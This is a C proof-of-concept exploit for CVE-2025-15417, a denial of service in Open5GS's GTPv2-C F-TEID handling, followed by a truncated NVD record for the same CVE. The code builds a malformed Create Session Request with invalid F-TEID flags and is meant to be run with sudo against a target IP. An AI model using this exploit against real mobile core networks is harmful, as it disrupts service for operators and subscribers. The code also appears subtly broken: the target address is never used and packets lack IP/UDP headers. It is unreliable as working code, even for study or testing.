CVE-2025-15417

/* * CVE-2025-15417 PoC - Open5GS SGWC GTPv2-C F-TEID DoS * This PoC demonstrates sending a malformed GTPv2-C Create Session Request * with crafted F-TEID to trigger denial of service in Open5GS. * * Usage: gcc -o poc poc.c -lsocket -lnet -lpcap * Run as: sudo ./poc <target_ip> */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <pcap.h> #define GTPV2C_PORT 2123 #define CREATE_SESSION_REQUEST 32 /* GTPv2-C Header */ typedef struct { uint8_t version:3; uint8_t piggyback:1; uint8_t teid_present:1; uint8_t spare:3; uint8_t message_type; uint16_t message_length; uint32_t teid; uint32_t sequence; uint8_t spare2[3]; } __attribute__((packed)) gtpv2c_header_t; /* F-TEID IE */ typedef struct { uint8_t type; uint16_t length; uint8_t flags; uint8_t f_teid_data[10]; } __attribute__((packed)) f_teid_ie_t; void send_malformed_packet(pcap_t *handle, char *target_ip) { unsigned char packet[256]; gtpv2c_header_t *gtp_hdr = (gtpv2c_header_t *)packet; f_teid_ie_t *f_teid = (f_teid_ie_t *)(packet + sizeof(gtpv2c_header_t)); /* Craft GTPv2-C Create Session Request */ gtp_hdr->version = 2; gtp_hdr->piggyback = 0; gtp_hdr->teid_present = 1; gtp_hdr->spare = 0; gtp_hdr->message_type = CREATE_SESSION_REQUEST; gtp_hdr->teid = 0; gtp_hdr->sequence = 0x000001; /* Malformed F-TEID with invalid flags */ f_teid->type = 0x57; /* F-TEID IE type */ f_teid->length = htons(9); f_teid->flags = 0xFF; /* Invalid flags to trigger vulnerability */ gtp_hdr->message_length = htons(sizeof(f_teid_ie_t) + 4); /* Send packet */ pcap_sendpacket(handle, packet, sizeof(gtpv2c_header_t) + sizeof(f_teid_ie_t)); printf("[+] Malformed GTPv2-C Create Session Request sent\n"); } int main(int argc, char *argv[]) { if (argc != 2) { fprintf(stderr, "Usage: %s <target_ip>\n", argv[0]); return 1; } char errbuf[PCAP_ERRBUF_SIZE]; pcap_t *handle = pcap_open_live("any", 65535, 1, 1000, errbuf); if (handle == NULL) { fprintf(stderr, "Error opening pcap: %s\n", errbuf); return 1; } send_malformed_packet(handle, argv[1]); pcap_close(handle); return 0; }

{"cve": {"id": "CVE-2025-15417", "sourceIdentifier": "[email protected]", "published": "2026-01-01T23:15:56.180", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was identified in Open5GS up to 2.7.6. Affected is the function sgwc_s11_handle_create_session_request of the file src/sgwc/s11-handler.c of the component GTPv2-C F-TEID Handler. Such manipulation leads to denial of service. The attack must be carried out locally. The exploit is publicly available and might be used. The name of the patch is 465273d13ba5d47b274c38c9d1b07f04859178a1. A patch should be applied to remediate this issue."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 1.9, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L", "baseScore": 3.3, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:L/AC:L/Au:S/C:N/I:N/A:P", "baseScore": 1.7, "accessVector": "LOCAL", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "PARTIAL"}, "baseSeverity": "LOW", "exploitabilityScore": 3.1, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-404"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:open5gs:open5gs:*:*:*:*:*:*:*:*", "versionEndIncluding": "2.7.6", "matchCriteriaId": "9C77332A-BAA3-4FE7-A237-B87F175C6F48"}]}]}], "references": [{"url": "https://github.com/open5gs/open5gs/", "source": "[email protected]"}, {"url": "https://github.com/open5gs/open5gs/commit/465273d13ba5d47b274c38c9d1b07f04859178a1", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/open5gs/open5gs/issues/4203", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Vendor Advisory"]}, {"url": "https://github.com/open5gs/open5gs/issues/4203#issue-3719257558", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Vendor Advisory"]}, {"url": "https://github.com/open5gs/open5gs/issues/4203#issuecomment-3681643498", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Vendor Advisory"]}, {"url": "https://vuldb.com/?ctiid.339339", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.339339", "source": "[email protected]", "tags": ["Thir ... (truncated)